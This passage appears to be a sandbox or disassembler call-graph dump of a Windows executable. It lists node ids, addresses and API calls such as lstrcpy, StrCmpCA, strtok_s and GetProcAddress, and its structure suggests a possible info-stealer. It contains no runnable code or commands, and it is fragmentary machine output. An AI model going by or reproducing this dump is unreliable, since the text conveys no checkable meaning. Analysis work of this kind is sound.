7 API calls 26475->27558 26477 415e57 26478 41a740 lstrcpy 26477->26478 26479 415e79 26478->26479 26480 401590 lstrcpy 26479->26480 26481 415e8d 26480->26481 27559 405960 39 API calls moneypunct 26481->27559 26483 415e93 27560 410f40 strtok_s StrCmpCA strtok_s lstrlenA lstrcpy 26483->27560 26485 415e9e 26486 401590 lstrcpy 26485->26486 26487 415eb5 26486->26487 27561 411a10 121 API calls 26487->27561 26489 415eba 26490 41a740 lstrcpy 26489->26490 26491 415ed6 26490->26491 27562 404fb0 8 API calls 26491->27562 26493 415edb 26494 401590 lstrcpy 26493->26494 26495 415f5b 26494->26495 27563 410740 292 API calls 26495->27563 26497 415f60 26498 41a740 lstrcpy 26497->26498 26499 415f86 26498->26499 26500 401590 lstrcpy 26499->26500 26501 415f9a 26500->26501 27564 405960 39 API calls moneypunct 26501->27564 26503 415fa0 27565 411170 strtok_s StrCmpCA strtok_s lstrlenA lstrcpy 26503->27565 26505 415fab 26506 401590 lstrcpy 26505->26506 26507 415feb 26506->26507 27566 401e80 67 API calls 26507->27566 26509 415ff0 26510 416000 26509->26510 26511 416092 26509->26511 26512 41a740 lstrcpy 26510->26512 26513 41a7a0 lstrcpy 26511->26513 26514 416020 26512->26514 26515 4160a5 26513->26515 26517 401590 lstrcpy 26514->26517 26516 401590 lstrcpy 26515->26516 26518 4160b9 26516->26518 26519 416034 26517->26519 27570 405960 39 API calls moneypunct 26518->27570 27567 405960 39 API calls moneypunct 26519->27567 26522 4160bf 27571 413560 36 API calls 26522->27571 26523 41603a 27568 4112d0 21 API calls moneypunct 26523->27568 26526 41608a 26529 41610b 26526->26529 26532 401590 lstrcpy 26526->26532 26527 416045 26528 401590 lstrcpy 26527->26528 26530 416085 26528->26530 26531 416130 26529->26531 26534 401590 lstrcpy 26529->26534 27569 413dc0 75 API calls 26530->27569 26535 416155 26531->26535 26538 401590 lstrcpy 26531->26538 26536 4160e7 26532->26536 26537 41612b 26534->26537 26540 41617a 26535->26540 26545 401590 lstrcpy 26535->26545 27572 4140b0 64 API calls moneypunct 26536->27572 27574 414780 116 API calls moneypunct 26537->27574 26543 416150 26538->26543 26541 41619f 26540->26541 26546 401590 lstrcpy 26540->26546 26547 4161c4 26541->26547 26553 401590 lstrcpy 26541->26553 27575 414bb0 67 API calls moneypunct 26543->27575 26544 4160ec 26549 401590 lstrcpy 26544->26549 26550 416175 26545->26550 26552 41619a 26546->26552 26555 4161e9 26547->26555 26556 401590 lstrcpy 26547->26556 26554 416106 26549->26554 27576 414d70 75 API calls 26550->27576 27577 414f40 69 API calls moneypunct 26552->27577 26559 4161bf 26553->26559 27573 415100 71 API calls 26554->27573 26557 416210 26555->26557 26562 401590 lstrcpy 26555->26562 26561 4161e4 26556->26561 26563 416220 26557->26563 26564 4162b3 26557->26564 27578 407710 125 API calls moneypunct 26559->27578 27579 415050 67 API calls moneypunct 26561->27579 26567 416209 26562->26567 26569 41a740 lstrcpy 26563->26569 26568 41a7a0 lstrcpy 26564->26568 27580 419010 54 API calls moneypunct 26567->27580 26571 4162c6 26568->26571 26572 416241 26569->26572 26573 401590 lstrcpy 26571->26573 26574 401590 lstrcpy 26572->26574 26575 4162da 26573->26575 26576 416255 26574->26576 27584 405960 39 API calls moneypunct 26575->27584 27581 405960 39 API calls moneypunct 26576->27581 26579 41625b 27582 4112d0 21 API calls moneypunct 26579->27582 26580 4162e0 27585 413560 36 API calls 26580->27585 26583 4162ab 26586 41a7a0 lstrcpy 26583->26586 26584 416266 26585 401590 lstrcpy 26584->26585 26587 4162a6 26585->26587 26588 4162fc 26586->26588 27583 413dc0 75 API calls 26587->27583 26590 401590 lstrcpy 26588->26590 26591 416310 26590->26591 27586 405960 39 API calls moneypunct 26591->27586 26593 41631c 26595 416338 26593->26595 27587 416630 9 API calls moneypunct 26593->27587 26595->26251 26597 404697 26596->26597 26598 4046ac 11 API calls 26597->26598 26599 40474f 6 API calls 26597->26599 26598->26597 26599->26256 26600->26343 26603 4010c2 moneypunct 26601->26603 26602 4010fd 26602->26373 26603->26602 26604 4010e2 VirtualFree 26603->26604 26604->26602 26606 401233 GlobalMemoryStatusEx 26605->26606 26606->26376 26607->26389 26609 41a7c2 26608->26609 26610 41a7ec 26609->26610 26611 41a7da lstrcpy 26609->26611 26610->26394 26611->26610 26613 41a740 lstrcpy 26612->26613 26614 416833 26613->26614 26615 41a9b0 4 API calls 26614->26615 26616 416845 26615->26616 26617 41a8a0 lstrcpy 26616->26617 26618 41684e 26617->26618 26619 41a9b0 4 API calls 26618->26619 26620 416867 26619->26620 26621 41a8a0 lstrcpy 26620->26621 26622 416870 26621->26622 26623 41a9b0 4 API calls 26622->26623 26624 41688a 26623->26624 26625 41a8a0 lstrcpy 26624->26625 26626 416893 26625->26626 26627 41a9b0 4 API calls 26626->26627 26628 4168ac 26627->26628 26629 41a8a0 lstrcpy 26628->26629 26630 4168b5 26629->26630 26631 41a9b0 4 API calls 26630->26631 26632 4168cf 26631->26632 26633 41a8a0 lstrcpy 26632->26633 26634 4168d8 26633->26634 26635 41a9b0 4 API calls 26634->26635 26636 4168f3 26635->26636 26637 41a8a0 lstrcpy 26636->26637 26638 4168fc 26637->26638 26639 41a7a0 lstrcpy 26638->26639 26640 416910 26639->26640 26640->26401 26642 41a812 26641->26642 26642->26404 26644 41a83f 26643->26644 26645 415b54 26644->26645 26646 41a87b lstrcpy 26644->26646 26645->26414 26646->26645 26648 41a8a0 lstrcpy 26647->26648 26649 416443 26648->26649 26650 41a8a0 lstrcpy 26649->26650 26651 416455 26650->26651 26652 41a8a0 lstrcpy 26651->26652 26653 416467 26652->26653 26654 41a8a0 lstrcpy 26653->26654 26655 415b86 26654->26655 26655->26420 26657 4045c0 34 API calls 26656->26657 26658 4026b4 26657->26658 26659 4045c0 34 API calls 26658->26659 26660 4026d7 26659->26660 26661 4045c0 34 API calls 26660->26661 26662 4026f0 26661->26662 26663 4045c0 34 API calls 26662->26663 26664 402709 26663->26664 26665 4045c0 34 API calls 26664->26665 26666 402736 26665->26666 26667 4045c0 34 API calls 26666->26667 26668 40274f 26667->26668 26669 4045c0 34 API calls 26668->26669 26670 402768 26669->26670 26671 4045c0 34 API calls 26670->26671 26672 402795 26671->26672 26673 4045c0 34 API calls 26672->26673 26674 4027ae 26673->26674 26675 4045c0 34 API calls 26674->26675 26676 4027c7 26675->26676 26677 4045c0 34 API calls 26676->26677 26678 4027e0 26677->26678 26679 4045c0 34 API calls 26678->26679 26680 4027f9 26679->26680 26681 4045c0 34 API calls 26680->26681 26682 402812 26681->26682 26683 4045c0 34 API calls 26682->26683 26684 40282b 26683->26684 26685 4045c0 34 API calls 26684->26685 26686 402844 26685->26686 26687 4045c0 34 API calls 26686->26687 26688 40285d 26687->26688 26689 4045c0 34 API calls 26688->26689 26690 402876 26689->26690 26691 4045c0 34 API calls 26690->26691 26692 40288f 26691->26692 26693 4045c0 34 API calls 26692->26693 26694 4028a8 26693->26694 26695 4045c0 34 API calls 26694->26695 26696 4028c1 26695->26696 26697 4045c0 34 API calls 26696->26697 26698 4028da 26697->26698 26699 4045c0 34 API calls 26698->26699 26700 4028f3 26699->26700 26701 4045c0 34 API calls 26700->26701 26702 40290c 26701->26702 26703 4045c0 34 API calls 26702->26703 26704 402925 26703->26704 26705 4045c0 34 API calls 26704->26705 26706 40293e 26705->26706 26707 4045c0 34 API calls 26706->26707 26708 402957 26707->26708 26709 4045c0 34 API calls 26708->26709 26710 402970 26709->26710 26711 4045c0 34 API calls 26710->26711 26712 402989 26711->26712 26713 4045c0 34 API calls 26712->26713 26714 4029a2 26713->26714 26715 4045c0 34 API calls 26714->26715 26716 4029bb 26715->26716 26717 4045c0 34 API calls 26716->26717 26718 4029d4 26717->26718 26719 4045c0 34 API calls 26718->26719 26720 4029ed 26719->26720 26721 4045c0 34 API calls 26720->26721 26722 402a06 26721->26722 26723 4045c0 34 API calls 26722->26723 26724 402a1f 26723->26724 26725 4045c0 34 API calls 26724->26725 26726 402a38 26725->26726 26727 4045c0 34 API calls 26726->26727 26728 402a51 26727->26728 26729 4045c0 34 API calls 26728->26729 26730 402a6a 26729->26730 26731 4045c0 34 API calls 26730->26731 26732 402a83 26731->26732 26733 4045c0 34 API calls 26732->26733 26734 402a9c 26733->26734 26735 4045c0 34 API calls 26734->26735 26736 402ab5 26735->26736 26737 4045c0 34 API calls 26736->26737 26738 402ace 26737->26738 26739 4045c0 34 API calls 26738->26739 26740 402ae7 26739->26740 26741 4045c0 34 API calls 26740->26741 26742 402b00 26741->26742 26743 4045c0 34 API calls 26742->26743 26744 402b19 26743->26744 26745 4045c0 34 API calls 26744->26745 26746 402b32 26745->26746 26747 4045c0 34 API calls 26746->26747 26748 402b4b 26747->26748 26749 4045c0 34 API calls 26748->26749 26750 402b64 26749->26750 26751 4045c0 34 API calls 26750->26751 26752 402b7d 26751->26752 26753 4045c0 34 API calls 26752->26753 26754 402b96 26753->26754 26755 4045c0 34 API calls 26754->26755 26756 402baf 26755->26756 26757 4045c0 34 API calls 26756->26757 26758 402bc8 26757->26758 26759 4045c0 34 API calls 26758->26759 26760 402be1 26759->26760 26761 4045c0 34 API calls 26760->26761 26762 402bfa 26761->26762 26763 4045c0 34 API calls 26762->26763 26764 402c13 26763->26764 26765 4045c0 34 API calls 26764->26765 26766 402c2c 26765->26766 26767 4045c0 34 API calls 26766->26767 26768 402c45 26767->26768 26769 4045c0 34 API calls 26768->26769 26770 402c5e 26769->26770 26771 4045c0 34 API calls 26770->26771 26772 402c77 26771->26772 26773 4045c0 34 API calls 26772->26773 26774 402c90 26773->26774 26775 4045c0 34 API calls 26774->26775 26776 402ca9 26775->26776 26777 4045c0 34 API calls 26776->26777 26778 402cc2 26777->26778 26779 4045c0 34 API calls 26778->26779 26780 402cdb 26779->26780 26781 4045c0 34 API calls 26780->26781 26782 402cf4 26781->26782 26783 4045c0 34 API calls 26782->26783 26784 402d0d 26783->26784 26785 4045c0 34 API calls 26784->26785 26786 402d26 26785->26786 26787 4045c0 34 API calls 26786->26787 26788 402d3f 26787->26788 26789 4045c0 34 API calls 26788->26789 26790 402d58 26789->26790 26791 4045c0 34 API calls 26790->26791 26792 402d71 26791->26792 26793 4045c0 34 API calls 26792->26793 26794 402d8a 26793->26794 26795 4045c0 34 API calls 26794->26795 26796 402da3 26795->26796 26797 4045c0 34 API calls 26796->26797 26798 402dbc 26797->26798 26799 4045c0 34 API calls 26798->26799 26800 402dd5 26799->26800 26801 4045c0 34 API calls 26800->26801 26802 402dee 26801->26802 26803 4045c0 34 API calls 26802->26803 26804 402e07 26803->26804 26805 4045c0 34 API calls 26804->26805 26806 402e20 26805->26806 26807 4045c0 34 API calls 26806->26807 26808 402e39 26807->26808 26809 4045c0 34 API calls 26808->26809 26810 402e52 26809->26810 26811 4045c0 34 API calls 26810->26811 26812 402e6b 26811->26812 26813 4045c0 34 API calls 26812->26813 26814 402e84 26813->26814 26815 4045c0 34 API calls 26814->26815 26816 402e9d 26815->26816 26817 4045c0 34 API calls 26816->26817 26818 402eb6 26817->26818 26819 4045c0 34 API calls 26818->26819 26820 402ecf 26819->26820 26821 4045c0 34 API calls 26820->26821 26822 402ee8 26821->26822 26823 4045c0 34 API calls 26822->26823 26824 402f01 26823->26824 26825 4045c0 34 API calls 26824->26825 26826 402f1a 26825->26826 26827 4045c0 34 API calls 26826->26827 26828 402f33 26827->26828 26829 4045c0 34 API calls 26828->26829 26830 402f4c 26829->26830 26831 4045c0 34 API calls 26830->26831 26832 402f65 26831->26832 26833 4045c0 34 API calls 26832->26833 26834 402f7e 26833->26834 26835 4045c0 34 API calls 26834->26835 26836 402f97 26835->26836 26837 4045c0 34 API calls 26836->26837 26838 402fb0 26837->26838 26839 4045c0 34 API calls 26838->26839 26840 402fc9 26839->26840 26841 4045c0 34 API calls 26840->26841 26842 402fe2 26841->26842 26843 4045c0 34 API calls 26842->26843 26844 402ffb 26843->26844 26845 4045c0 34 API calls 26844->26845 26846 403014 26845->26846 26847 4045c0 34 API calls 26846->26847 26848 40302d 26847->26848 26849 4045c0 34 API calls 26848->26849 26850 403046 26849->26850 26851 4045c0 34 API calls 26850->26851 26852 40305f 26851->26852 26853 4045c0 34 API calls 26852->26853 26854 403078 26853->26854 26855 4045c0 34 API calls 26854->26855 26856 403091 26855->26856 26857 4045c0 34 API calls 26856->26857 26858 4030aa 26857->26858 26859 4045c0 34 API calls 26858->26859 26860 4030c3 26859->26860 26861 4045c0 34 API calls 26860->26861 26862 4030dc 26861->26862 26863 4045c0 34 API calls 26862->26863 26864 4030f5 26863->26864 26865 4045c0 34 API calls 26864->26865 26866 40310e 26865->26866 26867 4045c0 34 API calls 26866->26867 26868 403127 26867->26868 26869 4045c0 34 API calls 26868->26869 26870 403140 26869->26870 26871 4045c0 34 API calls 26870->26871 26872 403159 26871->26872 26873 4045c0 34 API calls 26872->26873 26874 403172 26873->26874 26875 4045c0 34 API calls 26874->26875 26876 40318b 26875->26876 26877 4045c0 34 API calls 26876->26877 26878 4031a4 26877->26878 26879 4045c0 34 API calls 26878->26879 26880 4031bd 26879->26880 26881 4045c0 34 API calls 26880->26881 26882 4031d6 26881->26882 26883 4045c0 34 API calls 26882->26883 26884 4031ef 26883->26884 26885 4045c0 34 API calls 26884->26885 26886 403208 26885->26886 26887 4045c0 34 API calls 26886->26887 26888 403221 26887->26888 26889 4045c0 34 API calls 26888->26889 26890 40323a 26889->26890 26891 4045c0 34 API calls 26890->26891 26892 403253 26891->26892 26893 4045c0 34 API calls 26892->26893 26894 40326c 26893->26894 26895 4045c0 34 API calls 26894->26895 26896 403285 26895->26896 26897 4045c0 34 API calls 26896->26897 26898 40329e 26897->26898 26899 4045c0 34 API calls 26898->26899 26900 4032b7 26899->26900 26901 4045c0 34 API calls 26900->26901 26902 4032d0 26901->26902 26903 4045c0 34 API calls 26902->26903 26904 4032e9 26903->26904 26905 4045c0 34 API calls 26904->26905 26906 403302 26905->26906 26907 4045c0 34 API calls 26906->26907 26908 40331b 26907->26908 26909 4045c0 34 API calls 26908->26909 26910 403334 26909->26910 26911 4045c0 34 API calls 26910->26911 26912 40334d 26911->26912 26913 4045c0 34 API calls 26912->26913 26914 403366 26913->26914 26915 4045c0 34 API calls 26914->26915 26916 40337f 26915->26916 26917 4045c0 34 API calls 26916->26917 26918 403398 26917->26918 26919 4045c0 34 API calls 26918->26919 26920 4033b1 26919->26920 26921 4045c0 34 API calls 26920->26921 26922 4033ca 26921->26922 26923 4045c0 34 API calls 26922->26923 26924 4033e3 26923->26924 26925 4045c0 34 API calls 26924->26925 26926 4033fc 26925->26926 26927 4045c0 34 API calls 26926->26927 26928 403415 26927->26928 26929 4045c0 34 API calls 26928->26929 26930 40342e 26929->26930 26931 4045c0 34 API calls 26930->26931 26932 403447 26931->26932 26933 4045c0 34 API calls 26932->26933 26934 403460 26933->26934 26935 4045c0 34 API calls 26934->26935 26936 403479 26935->26936 26937 4045c0 34 API calls 26936->26937 26938 403492 26937->26938 26939 4045c0 34 API calls 26938->26939 26940 4034ab 26939->26940 26941 4045c0 34 API calls 26940->26941 26942 4034c4 26941->26942 26943 4045c0 34 API calls 26942->26943 26944 4034dd 26943->26944 26945 4045c0 34 API calls 26944->26945 26946 4034f6 26945->26946 26947 4045c0 34 API calls 26946->26947 26948 40350f 26947->26948 26949 4045c0 34 API calls 26948->26949 26950 403528 26949->26950 26951 4045c0 34 API calls 26950->26951 26952 403541 26951->26952 26953 4045c0 34 API calls 26952->26953 26954 40355a 26953->26954 26955 4045c0 34 API calls 26954->26955 26956 403573 26955->26956 26957 4045c0 34 API calls 26956->26957 26958 40358c 26957->26958 26959 4045c0 34 API calls 26958->26959 26960 4035a5 26959->26960 26961 4045c0 34 API calls 26960->26961 26962 4035be 26961->26962 26963 4045c0 34 API calls 26962->26963 26964 4035d7 26963->26964 26965 4045c0 34 API calls 26964->26965 26966 4035f0 26965->26966 26967 4045c0 34 API calls 26966->26967 26968 403609 26967->26968 26969 4045c0 34 API calls 26968->26969 26970 403622 26969->26970 26971 4045c0 34 API calls 26970->26971 26972 40363b 26971->26972 26973 4045c0 34 API calls 26972->26973 26974 403654 26973->26974 26975 4045c0 34 API calls 26974->26975 26976 40366d 26975->26976 26977 4045c0 34 API calls 26976->26977 26978 403686 26977->26978 26979 4045c0 34 API calls 26978->26979 26980 40369f 26979->26980 26981 4045c0 34 API calls 26980->26981 26982 4036b8 26981->26982 26983 4045c0 34 API calls 26982->26983 26984 4036d1 26983->26984 26985 4045c0 34 API calls 26984->26985 26986 4036ea 26985->26986 26987 4045c0 34 API calls 26986->26987 26988 403703 26987->26988 26989 4045c0 34 API calls 26988->26989 26990 40371c 26989->26990 26991 4045c0 34 API calls 26990->26991 26992 403735 26991->26992 26993 4045c0 34 API calls 26992->26993 26994 40374e 26993->26994 26995 4045c0 34 API calls 26994->26995 26996 403767 26995->26996 26997 4045c0 34 API calls 26996->26997 26998 403780 26997->26998 26999 4045c0 34 API calls 26998->26999 27000 403799 26999->27000 27001 4045c0 34 API calls 27000->27001 27002 4037b2 27001->27002 27003 4045c0 34 API calls 27002->27003 27004 4037cb 27003->27004 27005 4045c0 34 API calls 27004->27005 27006 4037e4 27005->27006 27007 4045c0 34 API calls 27006->27007 27008 4037fd 27007->27008 27009 4045c0 34 API calls 27008->27009 27010 403816 27009->27010 27011 4045c0 34 API calls 27010->27011 27012 40382f 27011->27012 27013 4045c0 34 API calls 27012->27013 27014 403848 27013->27014 27015 4045c0 34 API calls 27014->27015 27016 403861 27015->27016 27017 4045c0 34 API calls 27016->27017 27018 40387a 27017->27018 27019 4045c0 34 API calls 27018->27019 27020 403893 27019->27020 27021 4045c0 34 API calls 27020->27021 27022 4038ac 27021->27022 27023 4045c0 34 API calls 27022->27023 27024 4038c5 27023->27024 27025 4045c0 34 API calls 27024->27025 27026 4038de 27025->27026 27027 4045c0 34 API calls 27026->27027 27028 4038f7 27027->27028 27029 4045c0 34 API calls 27028->27029 27030 403910 27029->27030 27031 4045c0 34 API calls 27030->27031 27032 403929 27031->27032 27033 4045c0 34 API calls 27032->27033 27034 403942 27033->27034 27035 4045c0 34 API calls 27034->27035 27036 40395b 27035->27036 27037 4045c0 34 API calls 27036->27037 27038 403974 27037->27038 27039 4045c0 34 API calls 27038->27039 27040 40398d 27039->27040 27041 4045c0 34 API calls 27040->27041 27042 4039a6 27041->27042 27043 4045c0 34 API calls 27042->27043 27044 4039bf 27043->27044 27045 4045c0 34 API calls 27044->27045 27046 4039d8 27045->27046 27047 4045c0 34 API calls 27046->27047 27048 4039f1 27047->27048 27049 4045c0 34 API calls 27048->27049 27050 403a0a 27049->27050 27051 4045c0 34 API calls 27050->27051 27052 403a23 27051->27052 27053 4045c0 34 API calls 27052->27053 27054 403a3c 27053->27054 27055 4045c0 34 API calls 27054->27055 27056 403a55 27055->27056 27057 4045c0 34 API calls 27056->27057 27058 403a6e 27057->27058 27059 4045c0 34 API calls 27058->27059 27060 403a87 27059->27060 27061 4045c0 34 API calls 27060->27061 27062 403aa0 27061->27062 27063 4045c0 34 API calls 27062->27063 27064 403ab9 27063->27064 27065 4045c0 34 API calls 27064->27065 27066 403ad2 27065->27066 27067 4045c0 34 API calls 27066->27067 27068 403aeb 27067->27068 27069 4045c0 34 API calls 27068->27069 27070 403b04 27069->27070 27071 4045c0 34 API calls 27070->27071 27072 403b1d 27071->27072 27073 4045c0 34 API calls 27072->27073 27074 403b36 27073->27074 27075 4045c0 34 API calls 27074->27075 27076 403b4f 27075->27076 27077 4045c0 34 API calls 27076->27077 27078 403b68 27077->27078 27079 4045c0 34 API calls 27078->27079 27080 403b81 27079->27080 27081 4045c0 34 API calls 27080->27081 27082 403b9a 27081->27082 27083 4045c0 34 API calls 27082->27083 27084 403bb3 27083->27084 27085 4045c0 34 API calls 27084->27085 27086 403bcc 27085->27086 27087 4045c0 34 API calls 27086->27087 27088 403be5 EntryPoint 27087->27088 27089 4045c0 34 API calls 27088->27089 27090 403c17 27089->27090 27091 4045c0 34 API calls 27090->27091 27092 403c30 27091->27092 27093 4045c0 34 API calls 27092->27093 27094 403c49 27093->27094 27095 4045c0 34 API calls 27094->27095 27096 403c62 27095->27096 27097 4045c0 34 API calls 27096->27097 27098 403c7b 27097->27098 27099 4045c0 34 API calls 27098->27099 27100 403c94 27099->27100 27101 4045c0 34 API calls 27100->27101 27102 403cad 27101->27102 27103 4045c0 34 API calls 27102->27103 27104 403cc6 27103->27104 27105 4045c0 34 API calls 27104->27105 27106 403cdf 27105->27106 27107 4045c0 34 API calls 27106->27107 27108 403cf8 27107->27108 27109 4045c0 34 API calls 27108->27109 27110 403d11 27109->27110 27111 4045c0 34 API calls 27110->27111 27112 403d2a 27111->27112 27113 4045c0 34 API calls 27112->27113 27114 403d43 27113->27114 27115 4045c0 34 API calls 27114->27115 27116 403d5c 27115->27116 27117 4045c0 34 API calls 27116->27117 27118 403d75 27117->27118 27119 4045c0 34 API calls 27118->27119 27120 403d8e 27119->27120 27121 4045c0 34 API calls 27120->27121 27122 403da7 27121->27122 27123 4045c0 34 API calls 27122->27123 27124 403dc0 27123->27124 27125 4045c0 34 API calls 27124->27125 27126 403dd9 27125->27126 27127 4045c0 34 API calls 27126->27127 27128 403df2 27127->27128 27129 4045c0 34 API calls 27128->27129 27130 403e0b 27129->27130 27131 4045c0 34 API calls 27130->27131 27132 403e24 27131->27132 27133 4045c0 34 API calls 27132->27133 27134 403e3d 27133->27134 27135 4045c0 34 API calls 27134->27135 27136 403e56 27135->27136 27137 4045c0 34 API calls 27136->27137 27138 403e6f 27137->27138 27139 4045c0 34 API calls 27138->27139 27140 403e88 27139->27140 27141 4045c0 34 API calls 27140->27141 27142 403ea1 27141->27142 27143 4045c0 34 API calls 27142->27143 27144 403eba 27143->27144 27145 4045c0 34 API calls 27144->27145 27146 403ed3 27145->27146 27147 4045c0 34 API calls 27146->27147 27148 403eec 27147->27148 27149 4045c0 34 API calls 27148->27149 27150 403f05 27149->27150 27151 4045c0 34 API calls 27150->27151 27152 403f1e 27151->27152 27153 4045c0 34 API calls 27152->27153 27154 403f37 27153->27154 27155 4045c0 34 API calls 27154->27155 27156 403f50 27155->27156 27157 4045c0 34 API calls 27156->27157 27158 403f69 27157->27158 27159 4045c0 34 API calls 27158->27159 27160 403f82 27159->27160 27161 4045c0 34 API calls 27160->27161 27162 403f9b 27161->27162 27163 4045c0 34 API calls 27162->27163 27164 403fb4 27163->27164 27165 4045c0 34 API calls 27164->27165 27166 403fcd 27165->27166 27167 4045c0 34 API calls 27166->27167 27168 403fe6 27167->27168 27169 4045c0 34 API calls 27168->27169 27170 403fff 27169->27170 27171 4045c0 34 API calls 27170->27171 27172 404018 27171->27172 27173 4045c0 34 API calls 27172->27173 27174 404031 27173->27174 27175 4045c0 34 API calls 27174->27175 27176 40404a 27175->27176 27177 4045c0 34 API calls 27176->27177 27178 404063 27177->27178 27179 4045c0 34 API calls 27178->27179 27180 40407c 27179->27180 27181 4045c0 34 API calls 27180->27181 27182 404095 27181->27182 27183 4045c0 34 API calls 27182->27183 27184 4040ae 27183->27184 27185 4045c0 34 API calls 27184->27185 27186 4040c7 27185->27186 27187 4045c0 34 API calls 27186->27187 27188 4040e0 27187->27188 27189 4045c0 34 API calls 27188->27189 27190 4040f9 27189->27190 27191 4045c0 34 API calls 27190->27191 27192 404112 27191->27192 27193 4045c0 34 API calls 27192->27193 27194 40412b 27193->27194 27195 4045c0 34 API calls 27194->27195 27196 404144 27195->27196 27197 4045c0 34 API calls 27196->27197 27198 40415d 27197->27198 27199 4045c0 34 API calls 27198->27199 27200 404176 27199->27200 27201 4045c0 34 API calls 27200->27201 27202 40418f 27201->27202 27203 4045c0 34 API calls 27202->27203 27204 4041a8 27203->27204 27205 4045c0 34 API calls 27204->27205 27206 4041c1 27205->27206 27207 4045c0 34 API calls 27206->27207 27208 4041da 27207->27208 27209 4045c0 34 API calls 27208->27209 27210 4041f3 27209->27210 27211 4045c0 34 API calls 27210->27211 27212 40420c 27211->27212 27213 4045c0 34 API calls 27212->27213 27214 404225 27213->27214 27215 4045c0 34 API calls 27214->27215 27216 40423e 27215->27216 27217 4045c0 34 API calls 27216->27217 27218 404257 27217->27218 27219 4045c0 34 API calls 27218->27219 27220 404270 27219->27220 27221 4045c0 34 API calls 27220->27221 27222 404289 27221->27222 27223 4045c0 34 API calls 27222->27223 27224 4042a2 27223->27224 27225 4045c0 34 API calls 27224->27225 27226 4042bb 27225->27226 27227 4045c0 34 API calls 27226->27227 27228 4042d4 27227->27228 27229 4045c0 34 API calls 27228->27229 27230 4042ed 27229->27230 27231 4045c0 34 API calls 27230->27231 27232 404306 27231->27232 27233 4045c0 34 API calls 27232->27233 27234 40431f 27233->27234 27235 4045c0 34 API calls 27234->27235 27236 404338 27235->27236 27237 4045c0 34 API calls 27236->27237 27238 404351 27237->27238 27239 4045c0 34 API calls 27238->27239 27240 40436a 27239->27240 27241 4045c0 34 API calls 27240->27241 27242 404383 27241->27242 27243 4045c0 34 API calls 27242->27243 27244 40439c 27243->27244 27245 4045c0 34 API calls 27244->27245 27246 4043b5 27245->27246 27247 4045c0 34 API calls 27246->27247 27248 4043ce 27247->27248 27249 4045c0 34 API calls 27248->27249 27250 4043e7 27249->27250 27251 4045c0 34 API calls 27250->27251 27252 404400 27251->27252 27253 4045c0 34 API calls 27252->27253 27254 404419 27253->27254 27255 4045c0 34 API calls 27254->27255 27256 404432 27255->27256 27257 4045c0 34 API calls 27256->27257 27258 40444b 27257->27258 27259 4045c0 34 API calls 27258->27259 27260 404464 27259->27260 27261 4045c0 34 API calls 27260->27261 27262 40447d 27261->27262 27263 4045c0 34 API calls 27262->27263 27264 404496 27263->27264 27265 4045c0 34 API calls 27264->27265 27266 4044af 27265->27266 27267 4045c0 34 API calls 27266->27267 27268 4044c8 27267->27268 27269 4045c0 34 API calls 27268->27269 27270 4044e1 27269->27270 27271 4045c0 34 API calls 27270->27271 27272 4044fa 27271->27272 27273 4045c0 34 API calls 27272->27273 27274 404513 27273->27274 27275 4045c0 34 API calls 27274->27275 27276 40452c 27275->27276 27277 4045c0 34 API calls 27276->27277 27278 404545 27277->27278 27279 4045c0 34 API calls 27278->27279 27280 40455e 27279->27280 27281 4045c0 34 API calls 27280->27281 27282 404577 27281->27282 27283 4045c0 34 API calls 27282->27283 27284 404590 27283->27284 27285 4045c0 34 API calls 27284->27285 27286 4045a9 27285->27286 27287 419c10 27286->27287 27288 419c20 43 API calls 27287->27288 27289 41a036 8 API calls 27287->27289 27288->27289 27290 41a146 27289->27290 27291 41a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27289->27291 27292 41a153 8 API calls 27290->27292 27293 41a216 27290->27293 27291->27290 27292->27293 27294 41a298 27293->27294 27295 41a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27293->27295 27296 41a2a5 6 API calls 27294->27296 27297 41a337 27294->27297 27295->27294 27296->27297 27298 41a344 9 API calls 27297->27298 27299 41a41f 27297->27299 27298->27299 27300 41a4a2 27299->27300 27301 41a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27299->27301 27302 41a4ab GetProcAddress GetProcAddress 27300->27302 27303 41a4dc 27300->27303 27301->27300 27302->27303 27304 41a515 27303->27304 27305 41a4e5 GetProcAddress GetProcAddress 27303->27305 27306 41a612 27304->27306 27307 41a522 10 API calls 27304->27307 27305->27304 27308 41a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27306->27308 27309 41a67d 27306->27309 27307->27306 27308->27309 27310 41a686 GetProcAddress 27309->27310 27311 41a69e 27309->27311 27310->27311 27312 41a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27311->27312 27313 415ca3 27311->27313 27312->27313 27314 401590 27313->27314 27588 401670 27314->27588 27317 41a7a0 lstrcpy 27318 4015b5 27317->27318 27319 41a7a0 lstrcpy 27318->27319 27320 4015c7 27319->27320 27321 41a7a0 lstrcpy 27320->27321 27322 4015d9 27321->27322 27323 41a7a0 lstrcpy 27322->27323 27324 401663 27323->27324 27325 415510 27324->27325 27326 415521 27325->27326 27327 41a820 2 API calls 27326->27327 27328 41552e 27327->27328 27329 41a820 2 API calls 27328->27329 27330 41553b 27329->27330 27331 41a820 2 API calls 27330->27331 27332 415548 27331->27332 27333 41a740 lstrcpy 27332->27333 27334 415555 27333->27334 27335 41a740 lstrcpy 27334->27335 27336 415562 27335->27336 27337 41a740 lstrcpy 27336->27337 27338 41556f 27337->27338 27339 41a740 lstrcpy 27338->27339 27340 41557c 27339->27340 27341 401590 lstrcpy 27340->27341 27342 4152c0 29 API calls 27340->27342 27343 415643 StrCmpCA 27340->27343 27344 4156a0 StrCmpCA 27340->27344 27348 41a820 lstrlenA lstrcpy 27340->27348 27351 415856 StrCmpCA 27340->27351 27358 41a740 lstrcpy 27340->27358 27360 415a0b StrCmpCA 27340->27360 27371 4151f0 23 API calls 27340->27371 27374 41578a StrCmpCA 27340->27374 27377 41593f StrCmpCA 27340->27377 27378 41a7a0 lstrcpy 27340->27378 27379 41a8a0 lstrcpy 27340->27379 27341->27340 27342->27340 27343->27340 27344->27340 27345 4157dc 27344->27345 27346 41a8a0 lstrcpy 27345->27346 27347 4157e8 27346->27347 27349 41a820 2 API calls 27347->27349 27348->27340 27350 4157f6 27349->27350 27353 41a820 2 API calls 27350->27353 27351->27340 27352 415991 27351->27352 27354 41a8a0 lstrcpy 27352->27354 27355 415805 27353->27355 27356 41599d 27354->27356 27357 401670 lstrcpy 27355->27357 27359 41a820 2 API calls 27356->27359 27376 415811 27357->27376 27358->27340 27361 4159ab 27359->27361 27362 415a16 Sleep 27360->27362 27363 415a28 